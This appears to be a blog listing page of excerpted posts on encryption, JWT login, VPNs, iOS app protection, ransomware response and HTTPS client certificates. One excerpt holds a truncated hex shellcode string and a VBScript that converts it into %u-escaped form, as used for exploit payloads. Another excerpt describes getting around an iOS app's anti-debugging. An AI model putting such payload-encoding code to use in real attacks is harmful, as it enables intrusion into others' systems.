• Do you think that I will not dig out the configuration file in the database?


    1: Background 1. Tell a story I found a bug in the terminal of IOT cabinet a few days ago app.config The database connection string in is encrypted, because I want to switch the database during debugging, I need to put the ciphertext on a special tool to decrypt. After changing the database name on […]

  • Encryption in spring boot application.properties


    1 Overview What? It’s 2020, and you’re still writing clear text passwords in the configuration file of spring boot?Although it is a small project, no one read the textPlaintext is simple, fast and convenient!!!You see the direct user name root password 123456 how simple!!! …No nonsense. This article mainly talks about how to use jasypt […]

  • Comparison of proxy server and virtual private network


    Why do we compare proxy server and VPN? Before I talk about it, I’ll talk about why I want to compare these two things. Whether it is a proxy server (synonymous with the “proxy” below) or VPN, in fact, people use it for the same purpose, and the final effect is basically the same, that […]

  • What is JWT


    JSON WEB TOKEN An open standard based on JSON is designed to be compact and secure for single sign on of distributed sites for the purpose of transmitting statements between network application environments Traditional session authentication Session based authentication is difficult to extend the application itself The session session is stored in memory, and the […]

  • Spring boot integrates JWT to realize user login authentication


    JWT introduction What is JWT JWT is the abbreviation of JSON web token, which is based on theJSON(RFC 7519). A concise, self-contained method is defined for communication between two partiesJSONThe formal security of the object. Because of the existence of a digital signature, this information is trusted and can be used by JWTHMACAlgorithm orRSAThe public […]

  • Kwai, quick shadow iOSApp anti debug


    Kwai, quick shadow App protection is using the same set of code, anti debugging is also very easy, please look at the process. >As a developer, it is very important to have a learning atmosphere and a communication circle. This is my ownIOS communication groupNo matter you are Xiaobai or Daniel, welcome to join us. […]

  • IOS — data security and encryption


    reference resources:https://juejin.im/entry/58b93af3ac502e006c0820c9 1. Common encryption methods: Base64, MD5, AES, EDS, RSA HTTPS and SSL / TSL What is SSL?SSL (secure sockets layer), because the original HTTP protocol used on the Internet is plaintext, there are many shortcomings, such as the transmission content will be sniffed (sniffed) and tampered with. The function of SSL protocol is […]

  • Global exclusive | giving enterprise level open source unlimited possibilities, Alibaba cloud launched mongodb version 4.2


    Alibaba cloud mongodb version 4.2 provides a series of new features, such as distributed transaction, wildcard index, field level encryption, etc., so that cloud users can experience the latest version for the first time and build more efficient and flexible applications. As the world’s leading general database platform, mongodb is the No.1 NoSQL database in […]

  • VBS shellcode conversion escape encryption


    ‘code by NetPatch code=”\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xcf\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x0b\x9f\xc2\x0a\x4b\x93\x49\xf1\x17\x32\x49\xc1\x03\x14\x1a\x0a\x78\xa3\…………………………” function replaceregex(str)  set regex=new regExp  regex.pattern=”\\x(..)\\x(..)” regex.IgnoreCase=true  regex.global=true  matches=regex.replace(str,”%u$2$1″)  replaceregex=matches  end Function set fso=CreateObject(“scripting.filesystemobject”) set fileS=fso.opentextfile(“a.txt”,8,true) fileS.writeline replaceregex(code) files.close set fso=nothing

  • JWT implements login verification


    Why use JWT Due to the customer’s request to go online as soon as possible, the project temporarily dispatched personnel to complete the project. At the beginning, it only focused on the data, and did not consider the login verification. In addition, at that time, the project was only provided for one customer, so the […]

  • How to deal with the blackmail virus with. Harma suffix in the enterprise server?


      What is?HarmaBlackmail virus? name Harma virus Threat types Blackmail virus, encryption virus, file cabinet Encrypted file extension . harma (the blackmail virus also appends the victim‘s unique ID and developer’s email address to the file name). Test name Avast(Win32:RansomX-gen [Ransom]),BitDefender( Trojan.Ransom.Crysis .E),ESET-NOD32(Win32 / Filecoder.Crysis P), Trojan- Ransom.Win32 . Crusis.to ), full detection list (VirusTotal) […]

  • When PHP curl requests, set the client certificate and private key


    It’s a little strange because I haven’t been exposed to the two-way authentication of HTTPS before.Since SSL certificates and private keys are provided by the docking party, my understanding is as follows:The SSL certificate carries the public key of the client,The other server uses the private key of the client to verify, and then encrypts […]